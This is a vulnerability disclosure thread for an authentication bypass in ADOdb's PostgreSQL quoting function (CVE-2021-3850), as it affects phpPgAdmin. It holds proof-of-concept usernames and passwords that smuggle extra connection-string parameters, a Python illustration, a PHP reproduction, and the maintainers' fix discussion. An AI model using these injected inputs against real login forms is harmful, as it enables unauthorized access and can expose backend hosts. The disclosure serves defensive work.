Authentication Bypass by Primary Weakness in adodb/adodb


Reported on

Oct 28th 2021


An attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes(). The function can be bypassed, in phppgadmin for example, by surrounding the username in quotes and submitting it with other parameters injected in between.

Proof of Concept

I'm going to use phppgadmin as an example of a project that this affects.

When a user goes to log in, the username and password are passed to this function before reaching pg_connect():

function adodb_addslashes($s)
{
    $len = strlen($s);
    if ($len == 0) return "''";
    // "already quoted" shortcut: a value that starts and ends with a single quote is returned verbatim, unescaped
    if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted

    return "'".addslashes($s)."'";
}

An attacker can log in with a username of: 'testinguser' host='' and phppgadmin will log in but be connected to .


In the context of phppgadmin getting past the login panel opens up a lot more possibilities for functions to exploit. It can also reveal the backend IP of a server. I was unable to find anything other than the host parameter to inject into the connection string that was interesting.

This bypass also allows an attacker to use default logins that would otherwise be blocked in phppgadmin (the password part here could be bypassed by using '' lol='' as a password):

$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);
// the check runs on the raw submitted strings, not on the values PostgreSQL will actually receive
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {
   $msg = $lang['strlogindisallowed'];
}
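The following is an added example, not code from ADOdb or phpPgAdmin, illustrating both points above: the "already quoted" shortcut in adodb_addslashes() that lets a quoted username carry extra key=value pairs into the connection string, and why the raw-string checks in the phppgadmin login code do not see the same values PostgreSQL sees. It ports the quoting logic to Python, pairs it with a hardened quoting routine of this example's own (not the upstream fix), and parses the resulting libpq-style connection string so the effective parameters can be compared. The key order in build_conninfo, the sample credentials and the placeholder hostname are all constructed for this example.

```python
"""Added example: vulnerable vs. hardened quoting for a libpq-style
connection string, plus a small parser to show what PostgreSQL would see."""


def php_addslashes(s: str) -> str:
    """Mimic PHP addslashes(): backslash-escape single quote, double quote,
    backslash and NUL."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\0", "\\0"))


def adodb_addslashes_vulnerable(s: str) -> str:
    """Port of the adodb_addslashes() shown in the report. The 'already quoted'
    shortcut hands back any value that starts AND ends with a single quote,
    so nothing between those quotes is ever escaped."""
    if len(s) == 0:
        return "''"
    if s[0] == "'" and s[-1] == "'":
        return s  # returned verbatim
    return "'" + php_addslashes(s) + "'"


def quote_conninfo_value(s: str) -> str:
    """Hardened quoting (this example's own, not ADOdb's fix): always wrap in
    single quotes and escape the two characters libpq treats specially inside
    a quoted value, backslash and single quote. There is no shortcut, so a
    value that happens to begin and end with a quote is still escaped."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_conninfo(host, user, password, dbname, quote):
    """Assemble the key=value string; host-before-user order is an assumption
    of this example, chosen to match the override the report describes."""
    return (f"host={quote(host)} user={quote(user)} "
            f"password={quote(password)} dbname={quote(dbname)}")


def parse_conninfo(conninfo: str) -> dict:
    """Minimal parser for libpq-style "key=value key='quoted value'" strings.
    Inside quotes a backslash escapes the next character. A repeated key keeps
    the last value, which is what lets an injected host replace the real one."""
    params, i, n = {}, 0, len(conninfo)
    while i < n:
        while i < n and conninfo[i].isspace():
            i += 1
        if i >= n:
            break
        eq = conninfo.find("=", i)
        if eq < 0:
            raise ValueError("expected key=value at offset %d" % i)
        key = conninfo[i:eq].strip()
        i = eq + 1
        while i < n and conninfo[i].isspace():
            i += 1
        if i < n and conninfo[i] == "'":          # quoted value
            i += 1
            buf = []
            while True:
                if i >= n:
                    raise ValueError("unterminated quoted value for %s" % key)
                c = conninfo[i]
                if c == "\\":
                    if i + 1 >= n:
                        raise ValueError("dangling backslash in %s" % key)
                    buf.append(conninfo[i + 1])
                    i += 2
                elif c == "'":
                    i += 1
                    break
                else:
                    buf.append(c)
                    i += 1
            value = "".join(buf)
        else:                                      # bare value up to whitespace
            j = i
            while j < n and not conninfo[j].isspace():
                j += 1
            value = conninfo[i:j]
            i = j
        params[key] = value
    return params


def effective_params(username: str, password: str, quote) -> dict:
    """Parameters PostgreSQL would actually receive for a login attempt;
    host and dbname are constructed sample values."""
    return parse_conninfo(build_conninfo("localhost", username, password, "dbname", quote))


def raw_login_check_passes(username: str, password: str) -> bool:
    """Port of the phppgadmin check from the report, which inspects the raw
    submitted strings rather than the effective connection parameters."""
    bad_usernames = ("pgsql", "postgres", "root", "administrator")
    return not (password == "" or username.lower() in bad_usernames)


# Constructed inputs in the shape the report describes; the hostname is a placeholder.
EVIL_USERNAME = "'testinguser' host='injected-host.invalid'"
EVIL_PASSWORD = "'' lol=''"

if __name__ == "__main__":
    print("raw check passes:", raw_login_check_passes(EVIL_USERNAME, EVIL_PASSWORD))
    print("vulnerable:", effective_params(EVIL_USERNAME, EVIL_PASSWORD, adodb_addslashes_vulnerable))
    print("hardened:  ", effective_params(EVIL_USERNAME, EVIL_PASSWORD, quote_conninfo_value))
```

With the vulnerable quoting the parsed parameters carry the injected host and an empty password even though the raw-string check passed; with the hardened quoting the whole submitted string stays inside the user and password values and the real host is untouched. The general lesson is that input validation must run on the same canonical value the backend will interpret, and that quoting routines should never special-case "already quoted" input.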
We created a GitHub Issue asking the maintainers to create a 2 years ago
Damien Regad
2 years ago


Many thanks for the report.

I can confirm the vulnerability, which goes all the way back to the oldest version of the PostgreSQL driver I have in the ADOdb repository (4.65 / 2005).

I'll now check how to properly address the issue.

With regards to your POC, for the record and as far as I can tell, phpPgAdmin is using a customized (and therefore unsupported), very old version of ADOdb so they will have to patch their code manually once I fix this.

include '';
$db = ADONewConnection('pgsql');

$host_good = 'localhost';
$user_good = 'user';
$password = 'xxxx';
$database = 'dbname';

$user_evil = "'user' host=''";

$db->connect($host_good, $user_good, $password, $database); // success
$db->connect($host_good, $user_evil, $password, $database); // !!!
Damien Regad validated this vulnerability 2 years ago
meme-lord has been awarded the disclosure bounty
The fix bounty is now up for grabs
2 years ago


Ok, I'll send them a separate report once there's a fix although they have yet to respond to my other reports.

Damien Regad
2 years ago


Did you or are you planning to request a CVE-ID for this? If so, let me know the number, otherwise I can take care of it.

How would you like to be credited for the finding?

2 years ago


I have not applied for a CVE for this. I would like to be credited as Emmet Leahy of Sorcery Ltd. I'll request on the CVE to add a link to a writeup on my blog or something after it's fixed.

Damien Regad
2 years ago


@admin Submitting a patch using my fork of the repository will effectively make it (and the vulnerability) available to the general public...

Is there some way to submit a patch in a more private manner?

The alternative would be to just delay submitting the patch to you until hotfix releases are out, but I'd prefer to give the researcher a chance to test and confirm it effectively addresses the issue.

Jamie Slome
2 years ago

@dregad - thanks for your question! 👍

Once a fix has been confirmed against the report, it will be made public. This is done using the confirm fix button on the page.

I can see that you have already discussed this partially with Adam over Chatwoot, and so will go ahead and assign a CVE number for this report.

Once you are ready to publish this report and the CVE, let us know, so we can make both the CVE & report visible.

Jamie Slome
2 years ago

CVE-2021-3850 has now been assigned to this report! 🎊

Let me know if you have any further questions @dregad, and happy to support.

Damien Regad
2 years ago


I thought this would be a good opportunity to test Github's Security Advisories feature which, as I have just found out, allows to create a private repository to collaborate on the patch without disclosing it.

@meme-lord can you please confirm that you are using the same user ID on Github (and if not, give me your Github username) so I can grant you access to the temporary private repo?

2 years ago


My Github username is meme-lord, same as here

Damien Regad marked this as fixed in 5.20.21 with commit 952de6 2 years ago
Damien Regad has been awarded the fix bounty